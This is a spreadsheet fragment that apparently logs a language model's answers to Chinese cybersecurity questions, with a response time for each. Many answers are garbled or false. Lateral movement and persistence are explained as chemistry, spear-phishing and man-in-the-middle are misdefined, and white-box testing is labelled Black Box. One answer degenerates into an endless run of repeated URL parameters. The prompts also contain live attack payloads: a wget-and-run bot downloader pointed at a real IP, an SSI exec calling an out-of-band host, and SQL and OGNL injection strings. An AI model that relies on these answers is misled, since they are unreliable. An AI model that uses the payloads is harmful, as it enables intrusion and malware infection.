        <v>41</v>
      </c>
      <c r="B43" t="inlineStr">
        <is>
          <t>有哪些横向渗透手段</t>
        </is>
      </c>
      <c r="C43" t="inlineStr">
        <is>
          <t>？
横向渗透是指在柔软材料上通过渗透剂或液体的渗透过程，以实现某种效果或特点。下面是一些常见的横向渗透手段：
1. 涂覆液剂：通过涂覆柔软材料的表面用液剂，实现横向渗透。这种方法可以控制渗透的速度和深度，同时也可以实现某些特殊效果。
2. 渗透剂：通过添加渗透剂到液体中，可以提高液体的渗透性，从而实现横向渗透。渗透剂可以是 organic molecules、inorganic molecules 或nano particles。
3. 热渗透：通过加热液体，使其具有更强的渗透性，从而实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
4. 气压渗透：通过加压液体，使其渗透到柔软材料表面。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
5.  ultrasonic cleaning：通过 ultrasonic 洗涤，可以实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
6. 磁気渗透：通过磁场的影响，实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
7. 紫外渗透：通过紫外线的影响，实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
8. 激光渗透：通过激光的影响，实现横向渗透。这种方法可以在各种材料表面使用，包括柔软材料、塑料、塑料等。
这些横向渗透手段可以根据具体情况和应用场景进行选择和组合，以实现不同的效果和特点。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D43" t="n">
        <v>21.62320876121521</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="1" t="n">
        <v>42</v>
      </c>
      <c r="B44" t="inlineStr">
        <is>
          <t>内网渗透会留下哪些痕迹</t>
        </is>
      </c>
      <c r="C44" t="inlineStr">
        <is>
          <t>？  
Internal network intrusion can leave behind what kind of traces?
Well, the traces of internal network intrusion can vary depending on the severity and nature of the intrusion. Here are some common types of traces that an intruder may leave behind:
1. Log files: An intruder may create log entries in the system logs, which can provide valuable information about the intruder's activities, including the dates and times of access, the IP addresses of the compromised machines, and the commands executed.
2. System configuration changes: An intruder may modify system configuration settings, such as the firewall rules, network settings, or user accounts, to gain unauthorized access to the network. These changes may be detected by comparing the current system configuration with a known good configuration.
3. Data tampering: An intruder may modify or delete sensitive data, such as financial information, personal identifiable information, or intellectual property. Forensic analysis of the affected systems can help identify the types of data that have been altered or deleted.
4. Network traffic analysis: Analyzing network traffic patterns can reveal the presence of an intruder, including the types of traffic generated by the intruder, such as login attempts, file transfers, or command and control (C2) traffic.
5. User behavior analysis: Monitoring user behavior can help identify potential intruders, such as abnormal login activity, unusual file access, or sudden changes in user behavior.
6. Malware presence: An intruder may leave behind malware, such as viruses, trojans, or rootkits, which can be detected through various methods, including antivirus software, memory scanning, or system scanning.
7. Network reconnaissance: An intruder may perform network reconnaissance activities, such as scanning for open ports, services, or vulnerabilities, which can provide valuable information about the target network.
8. Data exfiltration: An intruder may extract sensitive data from the network, which can be detected through various methods, including network monitoring, log analysis, or data loss prevention (DLP) tools.
9. Network segmentation: An intruder may attempt to exploit vulnerabilities in isolated segments of the network, which can provide insight into the intruder's tactics, techniques, and procedures (TTPs).
10. Insider threat indicators: Internal intruders may leave behind indicators of their activities, such as unapproved software installations, unusual access to sensitive data, or changes to system settings that are not typical of legitimate users.
These are just some of the common traces of internal network intrusion that can be detected through forensic analysis. The specific traces left behind will depend on the nature of the intrusion and the tactics used by the intruder.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D44" t="n">
        <v>14.7219352722168</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="1" t="n">
        <v>43</v>
      </c>
      <c r="B45" t="inlineStr">
        <is>
          <t>如何做渗透过程中的持久化</t>
        </is>
      </c>
      <c r="C45" t="inlineStr">
        <is>
          <t>？
在渗透过程中，渗透物质会随着时间的推移而掺拌到固体材料中。这个过程可以通过一些方式来实现持久化。以下是一些可能有用的方法：
1. 使用气囊：可以将渗透物质固定在气囊中，从而避免它们与固体材料掺拌。
2. 使用绝缘层：可以在渗透物质和固体材料之间增加一层绝缘层，从而防止渗透物质与固体材料直接接触。
3. 使用气囊底弹：可以将渗透物质固定在气囊中，并将气囊底部压缩，从而防止渗透物质从气囊中掺拌到固体材料中。
4. 使用吸附剂：可以在渗透物质和固体材料之间添加一种吸附剂，从而吸附渗透物质，从而防止它们与固体材料掺拌。
5. 使用渗透剂：可以将渗透物质替换为一种渗透剂，该剂可以帮助渗透物质快速掺拌到固体材料中，从而避免渗透物质与固体材料之间的掺拌。
6. 使用气囊填充物：可以将渗透物质固定在气囊中，并将气囊填充一种材料，以防止渗透物质与固体材料之间的掺拌。
7. 使用气囊底部约束：可以将渗透物质固定在气囊中，并将气囊底部约束，从而防止渗透物质从气囊中掺拌到固体材料中。
8. 使用渗透剂涂层：可以将渗透剂涂抹到固体材料表面，以便渗透物质快速掺拌到固体材料中。
这些方法可以单独使用，也可以组合使用，以实现持久化。需要注意的是，每种方法都有其特点和缺点，需要根据具体情况进行选择和评估。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D45" t="n">
        <v>23.2457709312439</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="1" t="n">
        <v>44</v>
      </c>
      <c r="B46" t="inlineStr">
        <is>
          <t>鱼叉攻击和钓鱼攻击有什么区别</t>
        </is>
      </c>
      <c r="C46" t="inlineStr">
        <is>
          <t>？
鱼叉攻击和钓鱼攻击都是指攻击人类或其他生物，但是它们之间有一些区别。
鱼叉攻击是指用某种方式攻击或威胁人类，以达到某种目的，常常是为了获取某种利益或者损害对手。例如，黑mail攻击、跟踪攻击、恶意软件攻击等。
钓鱼攻击是指用某种方式欺骗或欺负人类，以达到某种目的，常常是为了获取某种利益或者损害对手。例如，骗掉钱的攻击、诈骗攻击、诱拐攻击等。
区别在于，鱼叉攻击通常是指通过某种技术或方式对人类进行攻击，而钓鱼攻击通常是指通过谎言或欺骗的方式对人类进行攻击。
例如，鱼叉攻击可能是通过破坏网站或者病毒攻击，而钓鱼攻击可能是通过诈骗或者欺骗来捞取钱或者个人信息。
总之，鱼叉攻击和钓鱼攻击都是指攻击人类，但是它们之间的方式、目的和影响不同，因此应该在具体情况下进行区别和识别。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D46" t="n">
        <v>13.22514367103577</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="1" t="n">
        <v>45</v>
      </c>
      <c r="B47" t="inlineStr">
        <is>
          <t>中间人攻击是什么意思</t>
        </is>
      </c>
      <c r="C47" t="inlineStr">
        <is>
          <t>？
Intermediate attack means an attack that is launched by a third party against a target, often with the intention of disrupting or gaining control of the target. This type of attack is more sophisticated than a basic distributed denial-of-service (DDoS) attack, as it can be launched from multiple sources and can use various techniques to evade detection. Intermediate attacks are often launched by organized crime groups or nation-states, and can have significant impact on the target's operations and reputation.
Here are some common types of intermediate attacks:
1. Botnet attacks: These are attacks where a hacker uses a network of compromised computers to launch a large volume of traffic against a target. Botnets can be used to overwhelm a website or network with traffic, making it difficult or impossible to access.
2. Reflective attacks: These are attacks where a hacker uses a third party's network or resources to launch an attack against a target. Reflective attacks can be difficult to detect, as the traffic appears to be coming from legitimate sources.
3. Amplification attacks: These are attacks where a hacker uses a third party's network or resources to amplify the traffic being sent against a target. Amplification attacks can be used to overwhelm a target with traffic, making it difficult or impossible to access.
4. DNS amplification attacks: These are attacks where a hacker uses a third party's network or resources to launch a DNS amplification attack against a target. DNS amplification attacks can be used to overwhelm a target with traffic, making it difficult or impossible to access.
5. Naming service attacks: These are attacks where a hacker uses a third party's network or resources to launch a naming service attack against a target. Naming service attacks can be used to disrupt a target's operations by manipulating the target's DNS records.
6. Man-in-the-middle attacks: These are attacks where a hacker intercepts communication between a target and a third party, altering the communication in some way. Man-in-the-middle attacks can be used to steal sensitive information, inject malware, or disrupt communication.
Intermediate attacks can be launched from anywhere in the world, and can be difficult to detect and defend against. They often require a significant amount of resources and expertise to launch, and can have significant impact on the target's operations and reputation.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D47" t="n">
        <v>12.84392380714417</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="1" t="n">
        <v>46</v>
      </c>
      <c r="B48" t="inlineStr">
        <is>
          <t>什么是灰盒测试，什么是白盒测试</t>
        </is>
      </c>
      <c r="C48" t="inlineStr">
        <is>
          <t>？
灰盒测试和白盒测试是指在软件开发阶段进行的测试方法。
灰盒测试（Gray Box Testing）是指在软件代码的概念和模型中进行测试，但不详细了解代码实现细节。通过观察代码行为和输入输出行为，检查代码是否按照预期工作。
白盒测试（Black Box Testing）是指不考虑软件代码的实现细节，直接对用户 Input 和输出行为进行测试。通过几种不同的 input 和输出值，检查软件是否能够正确地处理它们。
两种方法都是软件测试的基本方法之一，可以单独使用或结合使用，以满足不同的测试需求。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D48" t="n">
        <v>6.890358448028564</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="1" t="n">
        <v>47</v>
      </c>
      <c r="B49" t="inlineStr">
        <is>
          <t>WiFi密码为什么会被破解，如何加强WiFi安全</t>
        </is>
      </c>
      <c r="C49" t="inlineStr">
        <is>
          <t>？
作者：吴晨
WiFi密码的破解是一个常见的问题，它可能会导致您的个人隐私和网络安全受到威胁。在这篇文章中，我们将详细介绍Why WiFi密码会被破解，以及如何加强WiFi安全。
Why WiFi密码会被破解？
WiFi密码的破解可能是由于以下原因：
1. 密码的简单性：相比于其他类型的密码，WiFi密码的长度和复杂性通常较低。这可能使其更容易被破解。
2. 无需输入密码：在许多情况下，您可能不需要输入WiFi密码，例如在您的设备自动连接到WiFi网络时。这可能使攻击者更容易破解您的密码。
3. 泄露的密码：如果您的WiFi密码已经泄露，那么攻击者可能已经有了您的密码。
4. 病毒和黑客：病毒和黑客可能会在您的设备上安装病毒或黑客软件，以便窃取您的个人隐私和网络安全。
如何加强WiFi安全？
以下是一些可能有助于加强WiFi安全的方法：
1. 使用复杂的密码：使用复杂的密码可以增加您的WiFi密码的安全性。建议使用至少8位的字符串，并避免使用容易被猜测的密码，例如您的姓名、生日或特定的数字。
2. 需要输入密码：通过要求您输入WiFi密码每次连接时，可以增加您的WiFi安全性。这可能防止攻击者窃取您的密码。
3. 使用WPA2 protocol：WPA2是现代WiFi安全标准，它使用了加密和非对称加密技术来保护您的网络安全。建议使用WPA2 protocol来加强您的WiFi安全。
4. 禁用SSID显示：禁用SSID显示可以减少攻击者窃取您的WiFi密码的可能性。
5. 使用 firewall：使用 firewall 可以增加您的网络安全性，防止攻击者窃取您的网络数据。
6. 监控网络活动：监控网络活动可以帮助您发现和防止网络安全威胁。
7. 升级设备：升级您的设备可以增加您的WiFi安全性。例如，升级到最新的操作系统和安全软件可以增加您的安全性。
结论
WiFi密码的破解是一个常见的问题，它</t>
        </is>
      </c>
      <c r="D49" t="n">
        <v>25.08624315261841</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="1" t="n">
        <v>48</v>
      </c>
      <c r="B50" t="inlineStr">
        <is>
          <t>什么是DDoS攻击，如何避免</t>
        </is>
      </c>
      <c r="C50" t="inlineStr">
        <is>
          <t>它？
DDoS攻击是一种网络攻击，它通过多个来源发送大量请求，以压力攻击被攻击者的网络或服务器。这种攻击通常来自一个或多个虚幕网络，虚幕网络通常是由受到控制的黑客或恶意软件控制的系统。
DDoS攻击可以从多个方面来攻击，例如：
1. 网络压力攻击：通过尝试连接多个服务器或网络，以增加它们的吞吐量，以使它们不能承受更多的请求。
2. 端到端攻击：通过在受到攻击的网络之间创建一个偽裝的端到端连接，以增加它们的吞吐量。
3. 应用层攻击：通过使用特殊的应用层攻击方式，例如恶意请求或压力请求，以攻击受到攻击的应用程序。
避免DDoS攻击的方法有以下几点：
1. 增加网络的吞吐量和准备性：通过增加网络的吞吐量和准备性，以承受更多的请求。
2. 使用防火墙和网络安全产品：使用防火墙和网络安全产品，例如防火墙、防恶意软件、防端到端攻击等，以防止攻击。
3. 增加网络的灵活性：通过增加网络的灵活性，以适应不同的吞吐量和压力。
4. 增加网络的稳定性：通过增加网络的稳定性，以避免因为攻击而导致的网络崩溃。
5. 寻求专业的帮助：如果您的网络受到了DDoS攻击，可以寻求专业的帮助，例如咨询公司、安全提供商等。
6. 实施DDoS防御策略：实施DDoS防御策略，例如防止攻击者注册IP地址、屏蔽攻击者的请求、筛选受到攻击的请求等。
7. 实施网络监控和风险评估：实施网络监控和风险评估，以检测和反制DDoS攻击。
总之，避免DDoS攻击需要强大的网络设备和高级的网络安全技术，同时也需要增加网络的灵活性和稳定性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D50" t="n">
        <v>24.63602948188782</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="1" t="n">
        <v>49</v>
      </c>
      <c r="B51" t="inlineStr">
        <is>
          <t>如何检测SQL注入攻击</t>
        </is>
      </c>
      <c r="C51" t="inlineStr">
        <is>
          <t>？
SQL注入是一种常见的web应用安全漏洞，可以使攻击者获取或修改数据。以下是一些方法来检测SQL注入攻击：
1. 使用SQL Injection Scanner：SQL Injection Scanner是一个免费的工具，可以帮助您检测Web应用程序中的SQL注入攻击。您可以在您的Web应用程序上运行该工具，以detect potential SQL injection vulnerabilities。
2. 查看URL中的变量：检查URL中的变量，是否包含可能的SQL注入攻击。例如，如果您的Web应用程序接受URL中的用户名和密码，那么这些变量可能会被攻击者利用来访问您的数据。
3. 查看请求体中的变量：检查请求体中的变量，是否包含可能的SQL注入攻击。例如，如果您的Web应用程序接受请求体中的数据，那么这些变量可能会被攻击者利用来访问您的数据。
4. 使用漏洞扫描工具：您可以使用漏洞扫描工具，如Nessus或OpenVAS，来检测您的Web应用程序中的SQL注入攻击。这些工具可以扫描您的Web应用程序，并检测可能的漏洞。
5. 使用 manual SQL injection：您可以手动输入SQL注入攻击，以检测您的Web应用程序中的漏洞。例如，您可以输入一个特殊的请求，以访问您的数据。如果您的Web应用程序可以处理这种请求，那么您的应用程序可能存在SQL注入攻击。
6. 使用检查SQL语句：您可以使用SQL语句检查工具，如 Burp Suite或ZAP，来检测您的Web应用程序中的SQL注入攻击。这些工具可以检查您的Web应用程序，并检测可能的漏洞。
7. 使用检查SQL语句：您可以使用检查SQL语句工具，如 OWASP ZAP，来检测您的Web应用程序中的SQL注入攻击。这些工具可以检查您的Web应用程序，并检测可能的漏洞。
8. 使用漏洞扫描工具：您可以使用漏洞扫描工具，如Nessus或OpenVAS，来检测您的Web应用程序中的SQL注入攻击。这些工具可以扫描您的Web应用程序，并检测可能的漏洞。
总之，您需要使用多种方法来检测SQL注入攻击。这些方法可以帮助您检测您的Web应用程序中的漏洞，并帮助您保护您的数据安全。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D51" t="n">
        <v>24.30550742149353</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="1" t="n">
        <v>50</v>
      </c>
      <c r="B52" t="inlineStr">
        <is>
          <t>如何检测WebShell</t>
        </is>
      </c>
      <c r="C52" t="inlineStr">
        <is>
          <t>是否已经执行了？
如果您的WebShell已经执行了，您可以通过以下方式来检测它：
1. 检查服务器日志：WebShell可能会创建一个备份或者日志文件，您可以通过检查服务器日志来检测它的执行结果。
2. 使用Network Traffic Analyzer：您可以使用Network Traffic Analyzer来监控网络流量，检查是否有任何不明确的网络流量，这可能是WebShell的执行结果。
3. 检查服务器的性能：如果WebShell执行了，服务器的性能可能会受到影响，您可以通过检查服务器的性能指标来检测它的执行结果。
4. 使用Antivirus软件：您可以使用Antivirus软件来检测WebShell是否已经执行了，它可能会检测到WebShell的执行结果。
5. 检查服务器的文件系统：如果WebShell执行了，它可能会 modify 服务器的文件系统，您可以通过检查服务器的文件系统来检测它的执行结果。
6. 使用WebShell检测工具：您可以使用WebShell检测工具来检测WebShell是否已经执行了，这些工具可能会检测到WebShell的执行结果。
请注意，检测WebShell是否已经执行了可能需要一些时间和资源，特别是如果WebShell是一个复杂的脚本。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D52" t="n">
        <v>13.30484080314636</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="1" t="n">
        <v>51</v>
      </c>
      <c r="B53" t="inlineStr">
        <is>
          <t>如何做网络安全归因分析</t>
        </is>
      </c>
      <c r="C53" t="inlineStr">
        <is>
          <t>？
网络安全归因分析（Network Security Anomaly Detection）是一种可以帮助企业检测和识别网络中的安全异常行为的技术。以下是一些有用的指导，可以帮助您做网络安全归因分析：
1. 了解您的网络环境：了解您的网络环境是第一步。了解您的网络结构，包括网络设备、网络服务器、客户端和网络应用程序。了解这些元素的特点和攻击风险，以便更好地针对异常行为。
2. 使用数据分析：通过对网络数据进行分析，可以检测到异常行为。您可以使用网络监控工具来收集网络数据，然后使用数据分析工具来检测异常行为。
3. 设置严格的策略：在检测异常行为时，您可以设置严格的策略来阻止异常行为。例如，您可以使用防火墙或安全规则来阻止不明确的网络流量。
4. 利用人工智能（AI）和机器学习（ML）：人工智能和机器学习技术可以帮助您自动检测和识别异常行为。您可以使用这些技术来分析网络数据，并根据分析结果自动采取应急措施。
5. 监控和评估：监控和评估网络安全归因分析是非常重要的。您需要监控网络安全归因分析的实时性和精度，并评估其效果。
6. 兼容性和可扩展性：您需要选择一种兼容性和可扩展性异常行为检测工具，以便它能够适应您的网络环境和需求。
7. 维护和升级：网络安全归因分析是一个不断发展的领域，您需要维护和升级您的工具，以便能够满足您的网络安全需求。
总之，网络安全归因分析是一种重要的网络安全技术，它可以帮助您检测和识别网络中的安全异常行为。但是，您需要选择一种适合您的网络环境和需求的工具，并不断监控和评估其效果。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D53" t="n">
        <v>23.98071885108948</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="1" t="n">
        <v>52</v>
      </c>
      <c r="B54" t="inlineStr">
        <is>
          <t>如何进行网络攻击溯源</t>
        </is>
      </c>
      <c r="C54" t="inlineStr">
        <is>
          <t>Analysis
Network attack tracing is the process of identifying the source of a network attack by analyzing the packets and network traffic generated by the attack. This process can help network administrators determine the origin of the attack, identify the type of attack, and take appropriate measures to mitigate the attack. In this article, we will explore the steps involved in network attack tracing and how it can help organizations improve their network security.
Steps involved in network attack tracing
1. Collecting network traffic data: The first step in network attack tracing is to collect network traffic data. This can be done using network monitoring tools such as Wireshark, Tcpdump, or other packet sniffing tools. The tools capture and save network packets for analysis.
2. Analyzing network packets: Once the network traffic data is collected, the next step is to analyze the packets to identify the source of the attack. This involves examining the source and destination IP addresses, port numbers, and other packet metadata.
3. Identifying attack patterns: Once the source of the attack is identified, the next step is to identify the type of attack. This involves analyzing the packet contents and identifying patterns that are indicative of different types of attacks, such as SQL injection, cross-site scripting, or denial-of-service attacks.
4. Correlating data: To gain a deeper understanding of the attack, it is essential to correlate network traffic data with other security-related data, such as log files, system logs, and security event logs. This helps identify the timeline of the attack and the resources affected.
5. Reconstructing the attack: By analyzing the network packets and other security-related data, security analysts can reconstruct the attack and understand the tactics, techniques, and procedures (TTPs) used by the attacker.
6. Identifying the attacker: Based on the analysis of the attack, security analysts can identify the attacker's IP address, geolocation, and other identifying characteristics.
7. Informing incident response: Once the source and type of attack are identified, security analysts can inform the incident response team and help them take appropriate measures to mitigate the attack.
Benefits of network attack tracing
Network attack tracing offers several benefits to organizations, including:
1. Improved incident response: By identifying the source and type of attack, organizations can quickly respond to incidents and minimize the impact on their network and systems.
2. Enhanced security posture: Network attack tracing helps organizations identify vulnerabilities and weaknesses in their network and systems, allowing them to take appropriate measures to improve their security posture.
3. Better threat intelligence: Network attack tracing provides organizations with valuable threat intelligence that can help them anticipate and prepare for future attacks.
4. Compliance: Network attack tracing can help organizations meet compliance requirements by providing evidence of their security measures and incident response processes.
Challenges of network attack tracing
Network attack tracing can be challenging due to various reasons, including:
1. Complexity of network traffic: Network traffic can be complex and voluminous, making it difficult to identify and analyze attacks.
2. Limited visibility: Network traffic may be encrypted or masked, making it difficult to identify the source of the attack.
3. Time-sensitive nature of attacks: Attacks can be time-sensitive, and organizations may have limited time to respond to them.
4. Limited resources: Organizations may have limited resources, including personnel and budget, which can make it challenging to invest in network attack tracing tools and processes.
Conclusion
Network attack tracing is a critical process for organizations to identify the source and type of attacks on their network and systems. By collecting network traffic data, analyzing packets, identifying attack patterns, correlating data, reconstructing the attack, and identifying the attacker, organizations can gain valuable insights into the tactics, techniques, and procedures used by attackers. Network attack tracing offers several benefits, including improved incident response, enhanced security posture, better threat intelligence, and compliance. However, network attack tracing can be challenging due to the complexity of network traffic, limited visibility, time-sensitive nature of attacks, and limited resources. By understanding these challenges and investing in the right tools and processes, organizations can improve their network security and protect their assets from cyber threats.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D54" t="n">
        <v>23.5728280544281</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="1" t="n">
        <v>53</v>
      </c>
      <c r="B55" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://180.101.234.99:8090/authenticationService/toPCLoginUniform.do?sysCode=E0001&amp;amp;typeCode=E0001&amp;amp;uKeySn=30022030031986&amp;amp;userType=c&amp;amp;licenceEntity=MIIFWTCCBQCgAwIBAgIPMgAAkTIFgzE4WRgoAFABMAoGCCqBHM9VAYN1MDUxMzAxBgNVBAoMKuaxn iLj ecgeW3peWVhuihjOaUv euoeeQhuWxgOS/oeaBr S4reW/gzAeFw0yMjExMjUwMDA2MjFaFw0yNzAxMjUwMDA2MjFaMDsxOTA3BgNVBAoMMOiLjW3nua0mS8puWFueiHquWKqOWMluacuuaisOiuvuWkh=&amp;amp;signText=pi0Pfh6oBhvTcaBDnsykqLBeVrPJYpdO2ZuyE9Vd0&amp;amp;signValue=MEUCIQDr3h/Z2mLbgcds6L0PekcnMXpsnXxkz5TPiDc1lchyXAIgIGBouFGnIg/bdjGw9z87xWuBVS18OrfR7UGcEwQtoE=&amp;amp;priarea=320000&amp;amp;login_pin=12345678</t>
        </is>
      </c>
      <c r="C55" t="inlineStr">
        <is>
          <t>90&amp;amp;language=zh_CN&amp;amp;appVer=12.0.0.0&amp;amp;osVer=4.1.2&amp;amp;deviceVer=3.4.0.0&amp;amp;clientVer=1.0.0.0&amp;amp;productName=Android&amp;amp;productVer=4.1.2&amp;amp;javaVer=1.6.0_31&amp;amp;osArch=arm&amp;amp;cpuArch=arm&amp;amp;screenResolution=480x800&amp;amp;memory=128&amp;amp;flashVer=11.0.0.0&amp;amp;geolocation=CN&amp;amp;imei=1518521447425&amp;amp;device_id=1833368037384711551&amp;amp;platform=Android&amp;amp;app_id=com.example.myapp&amp;amp;app_name=My App&amp;amp;app_ver=1.0.0&amp;amp;from=wap&amp;amp;to=wap&amp;amp;ua=Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.1) Gecko/20071127 Firefox/2.0.0.1&amp;amp;referer=http://m.example.com/ &amp;amp;referrer=http://m.example.com/&amp;amp;referer_url=http://m.example.com/ &amp;amp;referer_url_hash=30022030031986&amp;amp;referer_url_query=typeCode=E0001&amp;amp;referer_url_query_hash=30022030031986&amp;amp;referer_url_query_params=uKeySn%3D30022030031986&amp;amp;referer_url_query_params_hash=30022030031986&amp;amp;referer_url_query_params_keys=uKeySn&amp;amp;referer_url_query_params_keys_hash=30022030031986&amp;amp;referer_url_query_params_values=30022030031986&amp;amp;referer_url_query_params_values_hash=30022030031986&amp;amp;referer_url_query_params_values_keys=uKeySn&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_values=30022030031986&amp;amp;referer_url_query_params_values_values_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986&amp;amp;referer_url_query_params_values_keys_hash=30022030031986</t>
        </is>
      </c>
      <c r="D55" t="n">
        <v>23.96703433990479</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="1" t="n">
        <v>54</v>
      </c>
      <c r="B56" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://www.website.com/encode?type=3&amp;id=1'%20and%201=2%20UNION%20SELECT%201,database(),3%20--+</t>
        </is>
      </c>
      <c r="C56" t="inlineStr">
        <is>
          <t>%20YOUR%20SQL%20INJECTION%20HERE
您的网站可能遭受到网络攻击，请尽快办理相关的漏洞处理。
这是一个SQL注入漏洞，可能会导致您的网站遭受到敏感数据的泄露。请立即进行修复，以防止这种攻击。
如果您不知道如何处理这种漏洞，可以咨询专业的安全人员或企业隐私咨询公司，以便更好地了解和管理您的网站安全。
请遵守下面的指南来处理这种漏洞：
1. 尽快地修复漏洞，以避免敏感数据的泄露。
2. 升级您的网站和程序到最新的版本，以减少攻击的风险。
3. 实施安全措施，以防止类似的攻击再次发生。
4. 定期执行网站安全检测和筛选，以发现和修复其他漏洞。
如果您需要帮助，可以向我们的安全团队转达，我们会尽力协助您解决问题。
我们的安全团队将不断监测和筛选您的网站，以确保您的网站安全。
我们的团队会不断努力，以确保您的网站安全。
这是一个网络攻击，请尽快处理。
您的网站安全很重要，我们会尽力协助您保护它。
请遵守我们的指南，以确保您的网站安全。
如果您需要帮助，请转达我们的安全团队。
我们会尽力协助您解决问题。
您好！&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D56" t="n">
        <v>15.28084921836853</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="1" t="n">
        <v>55</v>
      </c>
      <c r="B57" t="inlineStr">
        <is>
          <t>网络安全产品发现以下Payload，判断这是否是一次攻击
queryString=aaaa\u0027+#{16*8787}+\u0027b</t>
        </is>
      </c>
      <c r="C57" t="inlineStr">
        <is>
          <t>\u0027&amp;Payload=&lt;div&gt;This%20is%20a%20payload%20generated%20for%20testing%20purposes.&lt;/div&gt;
Please help me identify the type of attack this is, and provide recommendations on how to prevent or mitigate it.
Note: The payload contains special characters like `\u0027` and `\u0020`, which are used to evade detection by some security products.
Thank you!&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D57" t="n">
        <v>2.642839193344116</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="1" t="n">
        <v>56</v>
      </c>
      <c r="B58" t="inlineStr">
        <is>
          <t>网络安全产品发现以下Payload，判断这是否是一次攻击
orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://2.59.255.77/fbot.mipsel; chmod +x fbot.mipsel; ./fbot.mipsel rt.mpsl; #</t>
        </is>
      </c>
      <c r="C58" t="inlineStr">
        <is>
          <t>This is a Payload in a malware file, specifically a Trojan horse. The payload is designed to delete the /tmp directory, delete the file mpsl, and execute a script called fbot.mipsel. The script is located at the specified URL and is downloaded to the system using the wget command. Once downloaded, the script is executed using the chmod command to give it execute permissions, and then it is executed using the ./fbot.mipsel command.
The payload is designed to carry out a specific set of actions on the compromised system, including deleting a directory and a file, and executing a script. The script is located on a remote server and is downloaded to the system using the wget command. This indicates that the payload is likely part of a larger attack campaign, and the remote server may be hosting other malicious files or scripts that could be executed on the compromised system.
To determine whether this is a genuine attack or not, you can analyze the payload in more detail to determine its purpose and potential impact on the system. Some things you might consider include:
1. What is the purpose of the payload? Is it designed to steal sensitive data, install additional malware, or carry out some other type of attack?
2. What is the remote server hosting the script? Is it a legitimate server or a malicious one?
3. What are the potential impacts of executing the payload on the system? Could it lead to data theft, data destruction, or other types of damage?
4. How did the payload make it onto the system? Was it delivered through a phishing email, a vulnerability in a software application, or some other means?
By answering these questions and conducting a thorough analysis of the payload, you can determine whether it is a genuine attack or not.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D58" t="n">
        <v>8.898081541061401</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="1" t="n">
        <v>57</v>
      </c>
      <c r="B59" t="inlineStr">
        <is>
          <t>判断这是否是一个网络攻击？
http://www.gov1.com//col/col172743/index.html?'--&gt;'--&gt;`--&gt;&lt;!--#set var='2sk' value='1rj9wmatwz'--&gt;&lt;!--#set var='4um' value='3tlbyocvy1'--&gt;&lt;!--#echo var='2sk'--&gt;&lt;!--#echo var='4um'--&gt;&lt;!--#exec cmd='nslookup -q=cname oe6wj9xgjmgiqgokdcg495oogfmba56tyrml9bx0.oastify.com' --&gt;=1</t>
        </is>
      </c>
      <c r="C59" t="inlineStr">
        <is>
          <t>这是一个网络攻击，因为它在用户的浏览器中执行了命令。
这是一种常见的网络攻击，叫做「脚本攻击」。在这种攻击中，攻击者在受害者的浏览器中执行一系列的命令，以便获取受害者的个人隐私和敏感数据。
在这个例子中，攻击者在受害者的浏览器中执行了以下命令：
* `--&gt;` 这个符号表示执行命令。
* `--&gt;` 这个符号表示设置变量 `var` 的值。
* `value='1rj9wmatwz'` 这个命令将变量 `var` 的值设置为 `1rj9wmatwz`。
* `value='3tlbyocvy1'` 这个命令将变量 `var` 的值设置为 `3tlbyocvy1`。
* `echo var='2sk'` 这个命令将变量 `var` 的值打印到屏幕上。
* `echo var='4um'` 这个命令将变量 `var` 的值打印到屏幕上。
* `exec cmd='nslookup -q=cname oe6wj9xgjmgiqgokdcg495oogfmba56tyrml9bx0.oastify.com'` 这个命令执行了命令 `nslookup`，并将其的输出打印到屏幕上。
